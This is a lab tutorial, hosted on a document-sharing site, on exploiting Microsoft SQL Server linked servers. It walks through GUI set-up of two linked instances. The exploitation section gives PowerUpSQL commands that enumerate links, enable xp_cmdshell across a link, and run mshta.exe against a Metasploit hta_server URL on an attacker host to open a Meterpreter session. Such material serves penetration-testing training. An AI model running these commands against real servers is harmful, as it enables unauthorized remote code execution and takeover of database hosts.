Scribd
Upload
13 views

Abusing Linked Database - MSSQL - Hacking

Db hack

Uploaded by

Leonardo Zarate
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
13 views

Abusing Linked Database - MSSQL - Hacking

Db hack

Uploaded by

Leonardo Zarate
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 17

Contents

Introduction to Link Servers ................................................................... 3


Lab Set-Up .............................................................................................. 3
Exploiting Link Server ........................................................................... 13
Enumeration ................................................................................. 13
Code Execution.............................................................................. 14

Page 2 of 16
Introduction to Link Servers
A linked server acts as a bridge between two servers. Through a link, the server database can be
viewed/shared/edited by two or more servers that have access to the said database. Data from tables can
be joined together and queried through it. Linked Servers are designed for applications that need more
flexibility over how data is stored and retrieved. Whether the application uses parallel processing, random
queries, or joins between multiple Microsoft Access files, a Linked Server provides a better platform for
flexible application development. Data from multiple sources can be added to one table or appended to
existing data. You can use a Linked Server in place of an ordinary table like you might do when you make
a copy of an existing database table. Following things can be done via a Link Server:

 Control query plans


 Change column data type
 Optimize queries on the remote server
 Change plan for the local table
 Access remote table data
 Delete objects on the local database
 Change server used to access local tables
 Reconnect to a linked server
 Use replicated parameters
 Allow remote updates

Lab Set-Up
We will first set up a linked server. When the MSSQL server is installed, a default server is created on its
own. But we need another server so that we can link both of them. So, to create another server, launch
the installation process and choose New SQL Server Stand-alone installation or and add features to an
existing installation as shown in the image below:

Page 3 of 16
Then click on the Next button as shown in the image below:

In the next window of the dialogue box, select Perform a new installation of SQL Server 2016 and then
click on the Next button as shown in the image below:

Page 4 of 16
In the feature Selection dialogue box, choose the features you want to install and give the path of your
instance. Afterward, click on the Next button as shown in the image below:

Page 5 of 16
In the Instance configuration dialogue box, give the name of the server and click on the Next button as
shown in the image below:

In the Server Configuration dialogue box, make sure the startup is automatic, and then click on
the Next button as shown in the image below:

Page 6 of 16
In the Database Engine Configuration dialogue box, select Mixed Mode under Authentication Mode and
give the password for your server. Click on the Next button as shown in the image below:

Click on the Close button as the installation is now complete; just like shown in the image below:

Page 7 of 16
Now to connect to the server, choose the <Browse for more…> option in the drop-down menu
of Authentication as shown in the image below:

Choose your server and click on the OK button as shown in the image below:

Page 8 of 16
Now, as you can see in the image below, we have our two servers.

Page 9 of 16
Now go to the main server>Servere Objects>Linked Servers. Right-click on Linked Servers and
choose New Linked Server… option from the drop-down menu as shown in the image below:

In the Linked Server option, give the name of the server you want to link. In the Server Type, choose
the Other data source. Choose Microsoft OLE DB Provider from SQL Server from the drop-down menu
of Provider. Give your default server as the data source and give the database name in the Catalog. Finally,
click on the OK button as shown in the image below:

Page 10 of 16
In the Server Options, make sure RPC and RPC Out are true, as shown in the image below:

Page 11 of 16
In the Security tab, give the username and password of your default server, then click on the OK button
as shown in the image below:

After all this, your linked server will be created as shown in the image below:

Page 12 of 16
Exploiting Link Server
Enumeration
Now our link server is up and ready. As an attacker, we know nothing about the server. So, to enumerate
the link server, we will use PowerUpSQL and its following command:

Import-Module .\PowerUpSQL.ps1
Get-SQLServerLink -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -
Verbose

Page 13 of 16
As you can see in the image above, we have an instance name, linked server name, and catalogue name,
among other helpful information.

Code Execution
Now, to remotely gain access to the linked server, we will use PowerUpSQL and Metasploit. These two
tools have proved to be the best tools when it comes to attacking MSSQL servers.
Before we deploy these tools, we can go to facets > surface area configuration and confirm that
XPCmdshell is disabled, as shown in the image below:

Now, we will enable this XPCmdshell by using the following command of PowerUpSQL:

Page 14 of 16
Get-SQLServerLinkCrawl -Username sa -Password Password@1 -Instance WIN-
P83OS778EQK\SQLEXPRESS -Query "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;')"

Now that XPCmdshell is enabled, we will use Metasploit to generate a URL with the hta_server exploit,
and for this use the following set of commands:

use exploit/windows/misc/hta_server
set srvhost eth0
exploit

We have our URL. Now, we will execute this URL via PowerUpSQL so that we can have our Meterpreter
session. To deploy the said URL, use the following command:

Page 15 of 16
Get-SQLServerLinkCrawl -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -
Query "exec master..xp_cmdshell 'mshta.exe http://192.168.1.2:8080/ugfFOJBvO.hta' "

Once the command is executed successfully, we will have our meterpreter session as shown in the image
below:

In such a simple way, a linked server can be exploited and give the session to an attacker.
Reference:
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-link-crawling-
powerupsql/

Page 16 of 16
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security


Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer


Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in

You might also like